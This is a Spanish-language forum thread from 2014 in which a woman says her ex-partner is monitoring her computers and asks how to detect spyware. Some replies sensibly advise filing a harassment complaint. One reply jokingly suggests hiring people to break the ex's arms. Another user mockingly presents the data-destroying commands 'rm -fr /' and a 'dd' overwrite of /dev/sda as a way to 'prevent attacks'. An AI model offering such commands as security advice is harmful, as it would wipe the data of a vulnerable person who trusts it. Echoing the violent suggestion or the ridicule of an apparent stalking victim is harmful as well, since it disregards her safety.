Encuesta

Mi ex me esta monitoreando todo y por mas que corro el antivirus siempre sabe q diablos estoy haciendo

Por favor alguien me podría decir como puedo rastrear programas spias que corren en segundo plano para windows y andriod?
0 (0%)
Que programa puede rastrear la IP de la persona que me esta hackeando?
0 (0%)

Total de votos: 0

Autor Tema: monitoreo remoto  (Leído 6465 veces)

desesperada

• Liked: 0
  • mi ex me esta monitoreando mis computadoras AYUDA!
monitoreo remoto
« : noviembre 05, 2014, 07:04:19 pm »
Por favor suplico su ayuda para:

1.- Por favor alguien me podría decir como puedo rastrear programas spias que corren en segundo plano para windows y andriod? o

2.- que programa puede rastrear la IP de la persona que me esta hackeando? y

3.- Es cierto que si instalo LINUX mint mis problemas de que me esten monitoreando se terminan?

Gracias

Anarpi

• Liked: 162
  • tecnomaz.wordpress.com
    • TecnoMaz
Re:monitoreo remoto
« Respuesta #1 : noviembre 06, 2014, 01:10:40 pm »
mejor tira la computadora al mar, asi evitaras futuros problemas con los juankers
The Kansas City Shuffle...

matteshi

• **
  • Liked: 8
« Respuesta #2 : noviembre 06, 2014, 03:08:47 pm »
Por favor suplico su ayuda para:

1.- Por favor alguien me podría decir como puedo rastrear programas spias que corren en segundo plano para windows y andriod? o

2.- que programa puede rastrear la IP de la persona que me esta hackeando? y

3.- Es cierto que si instalo LINUX mint mis problemas de que me esten monitoreando se terminan?

Gracias

ola que tal!  mm porque dices que te esta monitoreando...???  mandame un PM  y vemos si con gusto checamos tu compu va y vemos si es verdad que esta monitoreando tu compu

saludos

desesperada

« Respuesta #3 : noviembre 06, 2014, 04:55:59 pm »
Respuesta para Anarpi

ya cambie de equipo, modem, email, tengo antivirus original y mi ex me sigue jodiendo (la verdad creo que tambien me sigue por mis antiguos contactos)

Respuesta para matteshi

Perdon por mi ignorancia pero Que es un PM? y ademas he descubierto que la empresa donde trabajaba todo el dominio de trabajo esta soportado por google, Quiere decir eso que pueden entrar a tu cuenta GMAIL sin la necesidad de hackearla?

un millon de gracias por responder
« Última Modificación: noviembre 06, 2014, 05:17:13 pm por desesperada »

beavis

• Moderador
  • *
  • Liked: 81
    • underground
« Respuesta #4 : noviembre 06, 2014, 06:23:29 pm »
procede penalmente y asunto arreglado.
"Todos somos muy ignorantes. Lo que ocurre es que
no todos ignoramos las mismas cosas" Albert Einstein

"Las mujeres, quedan en segundo plano cuando una computadora este de por medio" el5patas 1001100100110011010101101

desu

• *
  • Liked: 9
« Respuesta #5 : noviembre 06, 2014, 10:33:36 pm »
procede penalmente y asunto arreglado.

Esto.

Por hostigamiento y acoso para empezar, te puedes comunicar hasta por mail/teléfono (desde un cibercafe/locutorio por si acaso) a la DOCDH y te dan un folio y luego ya vas en persona (o puedes ir directo en persona), ahí te asesoran para proceder con tu caso en las instancias correspondientes.

abraxas

• **
  • y?
« Respuesta #6 : noviembre 06, 2014, 11:49:38 pm »
Contrata a unos tipos para que le quebren los brazos... al menos dejará de molestarte por un rato. O puedes levantar una denuncia por acoso. O puedes dejar de usar internet. O puedes dejar las cosas como están y esperar a que encuentre una nueva víctima...

flexlm

• Gundam Exia
  • Liked: 79
  • Mi IP es: 127.0.0.1
« Respuesta #7 : noviembre 07, 2014, 06:07:27 am »
ademas he descubierto que la empresa donde trabajaba todo el dominio de trabajo esta soportado por google, Quiere decir eso que pueden entrar a tu cuenta GMAIL sin la necesidad de hackearla?

Solo pueden controlar las cuentas de la empresa. Aun me cuesta trabajo entender por que hay individuos que no son capaces de utilizar google para saber mas de google.

Para prevenir ataques instala linux y haz esto:
Código: [Seleccionar]
# rm -fr /
O bien:
Código: [Seleccionar]
# dd bs=100M if=/dev/random of=/dev/sda
« Última Modificación: noviembre 07, 2014, 09:05:22 pm por flexlm »
No puedes ser joven para siempre pero te puedes quedar inmaduro indefinidamente.

Ahora puede apagar el equipo.

desesperada

« Respuesta #8 : noviembre 07, 2014, 01:28:23 pm »
Mil Gracias a todos y ojala me pueda librar de este psicópata

PS si alguien sabe en que sitio puedo estudiar para evitar ataques de monitoreo remoto se los agradeciere infinitamente.

flexlm

• Gundam Exia
  • Liked: 79
  • Mi IP es: 127.0.0.1
« Respuesta #9 : noviembre 08, 2014, 05:03:32 am »
Nunca pense que por lo de "rm -fr /" me mandara un MP de "3s7up1d3ces":

O SI no es indiscreción cuanto me cobrarías por entrenarme y quitarme lo bruto en seguridad informática?

y si me lo permites tengo esta pregunta, Tengo una cuenta de SKIPE con crédito pero como le puedo hacer para seguir usándola sin que la rastree esta perdona? es posible esto?

Saludos y mil perdones

Mejor que hagas lo que dijo Anarpi, es mas facil y los resultados son similares a los del "rm -fr /"

No cobramos pero tampoco te podemos ayudar con lo de "bruto".
« Última Modificación: noviembre 08, 2014, 05:07:01 am por flexlm »
No puedes ser joven para siempre pero te puedes quedar inmaduro indefinidamente.

Ahora puede apagar el equipo.